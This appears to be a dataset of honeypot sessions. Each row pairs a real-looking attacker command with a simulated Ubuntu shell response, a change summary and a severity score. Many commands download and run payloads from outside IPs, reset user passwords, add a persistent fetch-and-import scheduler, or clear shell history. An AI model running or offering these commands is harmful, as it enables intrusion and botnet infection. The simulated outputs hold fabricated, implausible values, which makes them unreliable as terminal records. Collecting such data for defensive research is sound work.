session_id
stringclasses
160 values
period
stringclasses
1 value
turn_index
int64
0
351
command
stringlengths
1
1.77k
response
stringlengths
12
6.81k
system_change
stringlengths
4
2.61k
severity_vi
int64
0
4
response_source
stringclasses
1 value
5993bb93b706
2021_2022
7
sh
root@ubuntu:~# sh #
The shell has been changed from 'bash' to 'sh'.
2
curated_ubuntu
5993bb93b706
2021_2022
8
cd /tmp || cd /var/ || cd /var/run || cd /mnt || cd /root || cd /;/bin/busybox echo -ne '\x45\x4c\x46'
# cd /tmp || cd /var/ || cd /var/run || cd /mnt || cd /root || cd / /tmp # /bin/busybox echo -ne '\x45\x4c\x46' ELF /tmp #
The working directory was changed to '/tmp'. The command '/bin/busybox echo -ne '\x45\x4c\x46'' was executed, which printed 'ELF' to the terminal.
2
curated_ubuntu
5993bb93b706
2021_2022
9
/bin/busybox wget;/bin/busybox echo -ne '\x45\x4c\x46'
/tmp # /bin/busybox wget wget: missing URL BusyBox v1.30.1 (Ubuntu 1:1.30.1-4ubuntu6.3) multi-call binary. Usage: wget [-c|--continue] [--spider] [-q|--quiet] [-O|--output-document FILE] [--header 'header: value'] [-Y|--proxy on/off] [-P DIR] [-U|--user-agent AGENT] [-T SEC] URL... Retrieve files via HTTP or FTP ...
The command '/bin/busybox wget' was executed, which displayed the usage information for the 'wget' command as no URL was provided. The command '/bin/busybox echo -ne '\x45\x4c\x46'' was executed again, which printed 'ELF' to the terminal.
0
curated_ubuntu
5993bb93b706
2021_2022
10
cd /tmp || cd /var/ || cd /var/run || cd /mnt || cd /root || cd /; rm -rf i; wget http://192.168.1.1:8088/i; curl -O http://192.168.1.1:8088/i; /bin/busybox wget http://192.168.1.1:8088/i; chmod 777 i || (cp /bin/ls ii;cat i>ii;rm i;cp ii i;rm ii); ./i; echo -e '\x63\x6F\x6E\x6E\x65\x63\x74\x65\x64'
/tmp # cd /tmp || cd /var/ || cd /var/run || cd /mnt || cd /root || cd / /tmp # rm -rf i /tmp # wget http://192.168.1.1:8088/i --2023-10-31 14:58:24-- http://192.168.1.1:8088/i Connecting to 192.168.1.1:8088... connected. HTTP request sent, awaiting response... 200 OK Length: 28 [application/x-sh] Saving to: ‘i’ 100%...
- The working directory was changed to '/tmp'. - The file 'i' was removed if it existed in the '/tmp' directory. - The file 'i' was downloaded three times from the server with IP '192.168.1.1' using different methods (wget, curl, busybox wget). The third download attempt failed with a '416 Requested Range Not Satisfia...
3
curated_ubuntu
ddda4178aab6
2021_2022
0
echo -e '\x79\x65\x73\x68\x65\x6c\x6f'
root@ubuntu:~# echo -e '\x79\x65\x73\x68\x65\x6c\x6f' yeshelo root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
ddda4178aab6
2021_2022
1
cat /bin/echo
root@ubuntu:~# cat /bin/echo #!/bin/sh # This is a busybox compatible echo - put something like this # in /etc/profile # export ECHO=/bin/echo echo $* root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
ddda4178aab6
2021_2022
2
cat /proc/mounts
root@ubuntu:~# cat /proc/mounts sysfs /sys sysfs rw,nosuid,nodev,noexec,relatime 0 0 proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0 udev /dev devtmpfs rw,nosuid,relatime,size=10240k,nr_inodes=2115792,mode=755 0 0 devpts /dev/pts devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000 0 0 tmpfs /run tmpfs rw,n...
No changes to the system.
0
curated_ubuntu
ddda4178aab6
2021_2022
3
cp /bin/echo //.f && >//.f && echo -e '\x67\x6f\x6f\x64\x77\x72\x69\x74\x65' && chmod 777 //.f; echo -e '\x63\x6d\x64\x67\x6f\x74'
root@ubuntu:~# cp /bin/echo //.f && >//.f && echo -e '\x67\x6f\x6f\x64\x77\x72\x69\x74\x65' && chmod 777 //.f; echo -e '\x63\x6d\x64\x67\x6f\x74' goodwrite cmdgot root@ubuntu:~#
The file '/bin/echo' was copied to '//.f', then the content of '//.f' was cleared. The string 'goodwrite' was printed to the terminal. The file '//.f' was given full permissions. The string 'cmdgot' was printed to the terminal.
2
curated_ubuntu
ddda4178aab6
2021_2022
4
cd //; wget http://2.58.149.116/spc -O- > .f; ./.f s.spc; >.f; echo test
root@ubuntu:~# cd //; wget http://2.58.149.116/spc -O- > .f; ./.f s.spc; >.f; echo test --2023-10-31 15:02:04-- http://2.58.149.116/spc Connecting to 2.58.149.116:80... connected. HTTP request sent, awaiting response... 200 OK Length: 28 [application/x-sh] Saving to: ‘STDOUT’ 100%[====================================...
The terminal changed the working directory to '//'. A shell script was downloaded from the server with IP '2.58.149.116' and saved to the file '.f'. The script '.f' was executed with 's.spc' as an argument. The content of '.f' was cleared. The string 'test' was printed to the terminal.
3
curated_ubuntu
ba5f71b95745
2021_2022
0
/ip cloud print
root@ubuntu:~# /ip cloud print bash: /ip: No such file or directory root@ubuntu:~#
No changes were made to the system.
0
curated_ubuntu
ba5f71b95745
2021_2022
1
ifconfig
root@ubuntu:~# ifconfig eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.1.10 netmask 255.255.255.0 broadcast 192.168.1.255 inet6 fe80::20c:29ff:fe9b:c7c2 prefixlen 64 scopeid 0x20<link> ether 00:0c:29:9b:c7:c2 txqueuelen 1000 (Ethernet) RX packets 267264 by...
No changes were made to the system.
0
curated_ubuntu
ba5f71b95745
2021_2022
2
uname -a
root@ubuntu:~# uname -a Linux user 5.4.0-159-generic #176-Ubuntu SMP Thu Oct 31 15:02:44 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux root@ubuntu:~#
No changes were made to the system.
0
curated_ubuntu
ba5f71b95745
2021_2022
3
cat /proc/cpuinfo
root@ubuntu:~# cat /proc/cpuinfo processor : 0 vendor_id : GenuineIntel cpu family : 6 model : 85 model name : Intel(R) Xeon(R) Silver 4214 CPU @ 2.20GHz stepping : 7 microcode : 0x1 cpu MHz : 2195.000 cache size : 16896 KB physical id : 0 siblings : ...
No changes were made to the system.
0
curated_ubuntu
ba5f71b95745
2021_2022
4
ps | grep '[Mm]iner'
root@ubuntu:~# ps | grep '[Mm]iner' 1234 pts/0 00:00:00 miner root@ubuntu:~#
No changes were made to the system.
0
curated_ubuntu
ba5f71b95745
2021_2022
5
ps -ef | grep '[Mm]iner'
root@ubuntu:~# ps -ef | grep '[Mm]iner' root 1234 1 0 Oct30 ? 00:00:00 /usr/bin/miner root 5678 1234 0 Oct30 ? 00:00:00 /usr/bin/miner --config /etc/miner.conf root 9012 5678 0 Oct30 ? 00:00:00 /usr/bin/miner --config /etc/miner.conf --log /var/log/miner.log root 3456 ...
No changes were made to the system.
0
curated_ubuntu
ba5f71b95745
2021_2022
6
ls -la /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
root@ubuntu:~# ls -la /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/* ls: cannot access '/dev/ttyGSM*': No such file or directory ls: cannot access '/dev/ttyUSB-mod*': No such file or directory ls: ...
No changes were made to the system.
0
curated_ubuntu
ba5f71b95745
2021_2022
7
echo Hi | cat -n
root@ubuntu:~# echo Hi | cat -n 1 Hi root@ubuntu:~#
No changes were made to the system.
0
curated_ubuntu
1f36379243cd
2021_2022
0
cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://185.142.239.224/dirdir000/0s1s12.x86; cat 0s1s12.x86 > z1z2z5a6qw5asda; chmod +x z1z2z5a6qw5asda; ./z1z2z5a6qw5asda Rooted.VPS; history -c
root@ubuntu:~# cat /etc/issue Ubuntu 18.04.5 LTS \n \l root@ubuntu:~# cd /tmp || cd /var/run || cd /mnt || cd /root || cd / root@/:~# wget -q http://185.142.239.224/dirdir000/0s1s12.x86 root@/:~# cat 0s1s12.x86 > z1z2z5a6qw5asda root@/:~# chmod +x z1z2z5a6qw5asda root@/:~# ./z1z2z5a6qw5asda Rooted.VPS root@/:~# histor...
- The terminal changed the working directory to '/'. - A file named '0s1s12.x86' was downloaded from the server with IP '185.142.239.224'. - The content of '0s1s12.x86' was copied to a new file named 'z1z2z5a6qw5asda'. - The file 'z1z2z5a6qw5asda' was given execute permissions and executed with the argument 'Rooted.VP...
3
curated_ubuntu
3d3539b8b5f4
2021_2022
0
uname -a
root@ubuntu:~# uname -a Linux user 5.4.0-159-generic #176-Ubuntu SMP Wed Oct 13 16:45:01 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
00c53c67cd60
2021_2022
0
cat /proc/cpuinfo | grep name | wc -l
root@ubuntu:~# cat /proc/cpuinfo | grep name | wc -l 24 root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
00c53c67cd60
2021_2022
1
echo -e "presto\nDddBNqAnfcDb\nDddBNqAnfcDb"|passwd|bash
root@ubuntu:# echo -e "presto\nDddBNqAnfcDb\nDddBNqAnfcDb"|passwd|bash New password: Retype new password: passwd: password updated successfully root@ubuntu:~#
The password for the user 'presto' has been changed to 'DddBNqAnfcDb'.
4
curated_ubuntu
00c53c67cd60
2021_2022
2
echo "presto\nDddBNqAnfcDb\nDddBNqAnfcDb\n"|passwd
root@ubuntu:~# echo "presto\nDddBNqAnfcDb\nDddBNqAnfcDb\n"|passwd passwd: password updated successfully root@ubuntu:~#
The password for the user 'presto' has been changed to 'DddBNqAnfcDb'.
4
curated_ubuntu
00c53c67cd60
2021_2022
3
cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
root@ubuntu:~# cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Intel(R) Xeon(R) Silver 4214 CPU @ 2.20GHz root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
00c53c67cd60
2021_2022
4
free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
root@ubuntu:~# free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' 725938364 123456 234567 345678 456789 567890 root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
00c53c67cd60
2021_2022
5
ls -lh $(which ls)
root@ubuntu:~# ls -lh $(which ls) -rwxr-xr-x 1 root root 129K Jan 18 2023 /bin/ls root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
00c53c67cd60
2021_2022
6
which ls
root@ubuntu:~# which ls /bin/ls root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
00c53c67cd60
2021_2022
7
crontab -l
root@ubuntu:~# crontab -l No crontab for root root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
00c53c67cd60
2021_2022
8
w
root@ubuntu:~# w 15:10:52 up 2:00, 1 user, load average: 0.00, 0.01, 0.05 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT root pts/0 192.168.1.100 13:10 2:00m 0.03s 0.03s -bash root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
00c53c67cd60
2021_2022
9
uname -m
root@ubuntu:~# uname -m x86_64 root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
00c53c67cd60
2021_2022
10
cat /proc/cpuinfo | grep model | grep name | wc -l
root@ubuntu:~# cat /proc/cpuinfo | grep model | grep name | wc -l 24 root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
00c53c67cd60
2021_2022
11
top
root@ubuntu:~# top top - 15:11:07 up 2:00, 1 user, load average: 0.00, 0.01, 0.05 Tasks: 133 total, 1 running, 132 sleeping, 0 stopped, 0 zombie %Cpu(s): 0.3 us, 0.1 sy, 0.0 ni, 99.6 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st MiB Mem : 708590.9 total, 703590.1 free, 5000.0 used, 0.8 buff/cache MiB Swap: ...
None
0
curated_ubuntu
894dcd8dee94
2021_2022
0
cat /proc/cpuinfo | grep name | wc -l
root@ubuntu:~# cat /proc/cpuinfo | grep name | wc -l 24 root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
894dcd8dee94
2021_2022
1
echo -e "elaine\nNDuXiHRXaKyS\nNDuXiHRXaKyS"|passwd|bash
root@ubuntu:~# echo -e "elaine\nNDuXiHRXaKyS\nNDuXiHRXaKyS"|passwd|bash New password: Retype new password: passwd: password updated successfully root@ubuntu:~#
The password for the user 'elaine' has been changed to 'NDuXiHRXaKyS'.
4
curated_ubuntu
894dcd8dee94
2021_2022
2
echo "elaine\nNDuXiHRXaKyS\nNDuXiHRXaKyS\n"|passwd
root@ubuntu:~# echo "elaine\nNDuXiHRXaKyS\nNDuXiHRXaKyS\n"|passwd New password: Retype new password: passwd: password updated successfully root@ubuntu:~#
The password for the user 'elaine' has been changed to 'NDuXiHRXaKyS'.
4
curated_ubuntu
894dcd8dee94
2021_2022
3
cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
root@ubuntu:~# cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Intel(R) Xeon(R) Silver root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
894dcd8dee94
2021_2022
4
free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
root@ubuntu:~# free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' 725938364 123456 234567 345678 456789 567890 root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
894dcd8dee94
2021_2022
5
ls -lh $(which ls)
root@ubuntu:~# ls -lh $(which ls) -rwxr-xr-x 1 root root 129K Jan 18 2023 /bin/ls root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
894dcd8dee94
2021_2022
6
which ls
root@ubuntu:~# which ls /bin/ls root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
894dcd8dee94
2021_2022
7
crontab -l
root@ubuntu:~# crontab -l # Edit this file to introduce tasks to be run by cron. # # Each task to run has to be defined through a single line # indicating with different fields when the task will be run # and what command to run for the task # # To define the time you can provide concrete values for # minute (m), hou...
No changes to the system.
0
curated_ubuntu
894dcd8dee94
2021_2022
8
w
root@ubuntu:~# w 15:15:36 up 2:00, 1 user, load average: 0.00, 0.01, 0.05 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT root pts/0 192.168.1.100 13:15 2.00s 0.03s 0.00s w root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
894dcd8dee94
2021_2022
9
uname -m
root@ubuntu:~# uname -m x86_64 root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
894dcd8dee94
2021_2022
10
cat /proc/cpuinfo | grep model | grep name | wc -l
root@ubuntu:~# cat /proc/cpuinfo | grep model | grep name | wc -l 24 root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
894dcd8dee94
2021_2022
11
top
root@ubuntu:~# top top - 15:16:49 up 2:00, 1 user, load average: 0.00, 0.01, 0.05 Tasks: 133 total, 1 running, 132 sleeping, 0 stopped, 0 zombie %Cpu(s): 0.3 us, 0.1 sy, 0.0 ni, 99.6 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st MiB Mem : 708590.9 total, 698171.3 free, 6412.3 used, 4007.3 buff/cache MiB Swap:...
None
0
curated_ubuntu
894dcd8dee94
2021_2022
12
uname
root@ubuntu:~# uname Linux root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
9ddd0fc999d4
2021_2022
0
cat /proc/cpuinfo | grep name | wc -l
root@ubuntu:~# cat /proc/cpuinfo | grep name | wc -l 24 root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
9ddd0fc999d4
2021_2022
1
echo -e "cassandra\nhpbJkCPw2Hb8\nhpbJkCPw2Hb8"|passwd|bash
root@ubuntu:~# echo -e "cassandra\nhpbJkCPw2Hb8\nhpbJkCPw2Hb8"|passwd|bash New password: Retype new password: passwd: password updated successfully root@ubuntu:~#
The password for the user 'cassandra' has been changed to 'hpbJkCPw2Hb8'.
4
curated_ubuntu
9ddd0fc999d4
2021_2022
2
echo "cassandra\nhpbJkCPw2Hb8\nhpbJkCPw2Hb8\n"|passwd
root@ubuntu:~# echo "cassandra\nhpbJkCPw2Hb8\nhpbJkCPw2Hb8\n"|passwd passwd: password updated successfully root@ubuntu:~#
The password for the user 'cassandra' has been changed to 'hpbJkCPw2Hb8'.
4
curated_ubuntu
9ddd0fc999d4
2021_2022
3
cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
root@ubuntu:~# cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Intel(R) Xeon(R) Silver 4214 CPU @ 2.20GHz root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
9ddd0fc999d4
2021_2022
4
free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
root@ubuntu:~# free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' 725938364 123456 567890 12345 67890 123456 root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
9ddd0fc999d4
2021_2022
5
ls -lh $(which ls)
root@ubuntu:~# ls -lh $(which ls) -rwxr-xr-x 1 root root 129K Jan 18 2023 /bin/ls root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
9ddd0fc999d4
2021_2022
6
which ls
root@ubuntu:~# which ls /bin/ls root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
9ddd0fc999d4
2021_2022
7
crontab -l
root@ubuntu:~# crontab -l No crontab for root root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
9ddd0fc999d4
2021_2022
8
w
root@ubuntu:~# w 15:21:37 up 2:00, 1 user, load average: 0.00, 0.01, 0.05 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT root pts/0 192.168.1.100 13:21 2.00s 0.03s 0.00s w root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
9ddd0fc999d4
2021_2022
9
uname -m
root@ubuntu:~# uname -m x86_64 root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
9ddd0fc999d4
2021_2022
10
cat /proc/cpuinfo | grep model | grep name | wc -l
root@ubuntu:~# cat /proc/cpuinfo | grep model | grep name | wc -l 24 root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
9ddd0fc999d4
2021_2022
11
top
root@ubuntu:~# top top - 15:21:57 up 2:00, 1 user, load average: 0.00, 0.01, 0.05 Tasks: 133 total, 1 running, 132 sleeping, 0 stopped, 0 zombie %Cpu(s): 0.3 us, 0.1 sy, 0.0 ni, 99.6 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st MiB Mem : 708590.9 total, 703590.9 free, 5000.0 used, 0.0 buff/cache MiB Swap:...
None
0
curated_ubuntu
9ddd0fc999d4
2021_2022
12
uname
root@ubuntu:~# uname Linux root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
9ddd0fc999d4
2021_2022
13
uname -a
root@ubuntu:~# uname -a Linux user 5.4.0-159-generic #176-Ubuntu SMP Wed Oct 13 16:45:01 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
37f388cc9bef
2021_2022
0
cat /proc/cpuinfo | grep name | wc -l
root@ubuntu:~# cat /proc/cpuinfo | grep name | wc -l 24 root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
37f388cc9bef
2021_2022
1
echo -e "fiscal\nsM7ZZfmcmaOh\nsM7ZZfmcmaOh"|passwd|bash
root@ubuntu:# echo -e "fiscal\nsM7ZZfmcmaOh\nsM7ZZfmcmaOh"|passwd|bash New password: Retype new password: passwd: password updated successfully root@ubuntu:~#
The password for the user 'fiscal' has been changed to 'sM7ZZfmcmaOh'.
4
curated_ubuntu
37f388cc9bef
2021_2022
2
echo "fiscal\nsM7ZZfmcmaOh\nsM7ZZfmcmaOh\n"|passwd
root@ubuntu:~# echo "fiscal\nsM7ZZfmcmaOh\nsM7ZZfmcmaOh\n"|passwd passwd: password updated successfully root@ubuntu:~#
The password for the user 'fiscal' has been reconfirmed as 'sM7ZZfmcmaOh'.
4
curated_ubuntu
37f388cc9bef
2021_2022
3
cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
root@ubuntu:~# cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Intel(R) Xeon(R) Silver 4214 CPU @ 2.20GHz root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
37f388cc9bef
2021_2022
4
free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
root@ubuntu:~# free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' 725938364 123456 567890 234567 345678 456789 root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
37f388cc9bef
2021_2022
5
ls -lh $(which ls)
root@ubuntu:~# ls -lh $(which ls) -rwxr-xr-x 1 root root 129K Jan 18 2023 /bin/ls root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
37f388cc9bef
2021_2022
6
which ls
root@ubuntu:~# which ls /bin/ls root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
37f388cc9bef
2021_2022
7
crontab -l
root@ubuntu:~# crontab -l # Edit this file to introduce tasks to be run by cron. # # Each task to run has to be defined through a single line # indicating with different fields when the task will be run # and what command to run for the task # # To define the time you can provide concrete values for # minute (m), hou...
No changes to the system.
0
curated_ubuntu
37f388cc9bef
2021_2022
8
w
root@ubuntu:~# w 15:28:31 up 2:00, 1 user, load average: 0.00, 0.01, 0.05 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT root pts/0 192.168.1.100 13:28 2.00s 0.03s 0.00s w root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
37f388cc9bef
2021_2022
9
uname -m
root@ubuntu:~# uname -m x86_64 root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
37f388cc9bef
2021_2022
10
cat /proc/cpuinfo | grep model | grep name | wc -l
root@ubuntu:~# cat /proc/cpuinfo | grep model | grep name | wc -l 24 root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
37f388cc9bef
2021_2022
11
top
root@ubuntu:~# top top - 15:30:01 up 2:01, 1 user, load average: 0.00, 0.01, 0.05 Tasks: 133 total, 1 running, 132 sleeping, 0 stopped, 0 zombie %Cpu(s): 0.3 us, 0.1 sy, 0.0 ni, 99.6 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st MiB Mem : 7076417.0 total, 6865072.0 free, 133344.0 used, 77001.0 buff/cache MiB S...
None
0
curated_ubuntu
37f388cc9bef
2021_2022
12
uname
root@ubuntu:~# uname Linux root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
37f388cc9bef
2021_2022
13
uname -a
root@ubuntu:~# uname -a Linux ubuntu 5.4.0-159-generic #176-Ubuntu SMP Wed Oct 13 16:45:01 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
37f388cc9bef
2021_2022
14
lscpu | grep Model
root@ubuntu:~# lscpu | grep Model Model name: Intel(R) Xeon(R) Silver 4214 CPU @ 2.20GHz root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
b601648a3301
2021_2022
0
/system scheduler add name="U6" interval=10m on-event="/tool fetch url=http://myfrance.xyz/poll/7affcbff-2216-4dca-ba48-80b5f7137ce4 mode=http dst-path=7wmp0b4s.rsc\r\n/import 7wmp0b4s.rsc" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write
root@ubuntu:~# /system scheduler add name="U6" interval=10m on-event="/tool fetch url=http://myfrance.xyz/poll/7affcbff-2216-4dca-ba48-80b5f7137ce4 mode=http dst-path=7wmp0b4s.rsc\r\n/import 7wmp0b4s.rsc" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write root@ubuntu:~#
A new system scheduler task named "U6" has been added. This task will run every 10 minutes, fetching a file from the URL "http://myfrance.xyz/poll/7affcbff-2216-4dca-ba48-80b5f7137ce4" and saving it as "7wmp0b4s.rsc". After fetching, it will import the file "7wmp0b4s.rsc". The task has been granted a wide range of poli...
3
curated_ubuntu
2a05d835dbbb
2021_2022
0
cat /bin/echo
root@ubuntu:~# cat /bin/echo #!/bin/sh # This is a busybox compatible echo - made to work on any shell if [ "$1" = "-n" ]; then shift else echo fi printf "%s" "$*" root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
2a05d835dbbb
2021_2022
1
>/tmp/.a && cd /tmp; >/dev/.a && cd /dev;wget http://2.58.149.116/spc -O- >.f;chmod 777 .f;./.f scan.wget.spc
root@ubuntu:~# >/tmp/.a && cd /tmp root@ubuntu:/tmp# >/dev/.a && cd /dev root@ubuntu:/dev# wget http://2.58.149.116/spc -O- >.f --2023-10-31 15:33:47-- http://2.58.149.116/spc Connecting to 2.58.149.116:80... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [text/plain] Saving to: ‘STDOUT’...
- Two files named '.a' were created in '/tmp' and '/dev' directories. - The terminal changed the working directory to '/dev'. - A file named '.f' was downloaded from the server with IP '2.58.149.116' and saved in the '/dev' directory. - The downloaded file '.f' was given full permissions and executed with 'scan.wget.s...
3
curated_ubuntu
e59aad1645b0
2021_2022
0
cd /tmp || cd /run || cd /; wget http://128.199.229.13/yoyobins.sh; chmod 777 yoyobins.sh; sh yoyobins.sh; tftp 128.199.229.13 -c get yoyotftp1.sh; chmod 777 yoyotftp1.sh; sh yoyotftp1.sh; tftp -r yoyotftp2.sh -g 128.199.229.13; chmod 777 yoyotftp2.sh; sh yoyotftp2.sh; rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh; rm -...
root@ubuntu:~# cd /tmp || cd /run || cd / root@tmp:~# wget http://128.199.229.13/yoyobins.sh --2023-10-31 15:34:01-- http://128.199.229.13/yoyobins.sh Connecting to 128.199.229.13:80... connected. HTTP request sent, awaiting response... 200 OK Length: 28 [application/x-sh] Saving to: ‘yoyobins.sh’ 100%[==============...
- The terminal changed the working directory to '/tmp'. - Three shell scripts were downloaded from the server with IP '128.199.229.13' using different methods (wget, tftp). - The downloaded scripts were given full permissions and executed. - All scripts and all files in the '/tmp' directory were removed.
4
curated_ubuntu
c6f29bc7f89d
2021_2022
0
>/tmp/.l && cd /tmp/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:~# >/tmp/.l && cd /tmp/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/tmp#
The terminal created a new file '.l' in the '/tmp' directory and changed the working directory to '/tmp'. The terminal then echoed the string 'PATH_DONE'.
2
curated_ubuntu
c6f29bc7f89d
2021_2022
1
>/var/.l && cd /var/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/tmp# >/var/.l && cd /var/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/var#
The terminal created a new file '.l' in the '/var' directory and changed the working directory to '/var'. The terminal then echoed the string 'PATH_DONE'.
2
curated_ubuntu
c6f29bc7f89d
2021_2022
2
>/dev/.l && cd /dev/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/var# >/dev/.l && cd /dev/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/dev#
The terminal created a new file '.l' in the '/dev' directory and changed the working directory to '/dev'. The terminal then echoed the string 'PATH_DONE'.
2
curated_ubuntu
c6f29bc7f89d
2021_2022
3
>/mnt/.l && cd /mnt/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/dev# >/mnt/.l && cd /mnt/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/mnt#
The terminal created a new file '.l' in the '/mnt' directory and changed the working directory to '/mnt'. The terminal then echoed the string 'PATH_DONE'.
2
curated_ubuntu
c6f29bc7f89d
2021_2022
4
>/var/run/.l && cd /var/run/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/mnt# >/var/run/.l && cd /var/run/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/var/run#
The terminal created a new file '.l' in the '/var/run' directory and changed the working directory to '/var/run'. The terminal then echoed the string 'PATH_DONE'.
2
curated_ubuntu
c6f29bc7f89d
2021_2022
5
>/var/tmp/.l && cd /var/tmp/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/var/run# >/var/tmp/.l && cd /var/tmp/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/var/tmp#
The terminal created a new file '.l' in the '/var/tmp' directory and changed the working directory to '/var/tmp'. The terminal then echoed the string 'PATH_DONE'.
2
curated_ubuntu
c6f29bc7f89d
2021_2022
6
>/.l && cd /; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/var/tmp# >/.l && cd /; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/#
The terminal created a new file '.l' in the root directory and changed the working directory to root. The terminal then echoed the string 'PATH_DONE'.
2
curated_ubuntu
c6f29bc7f89d
2021_2022
7
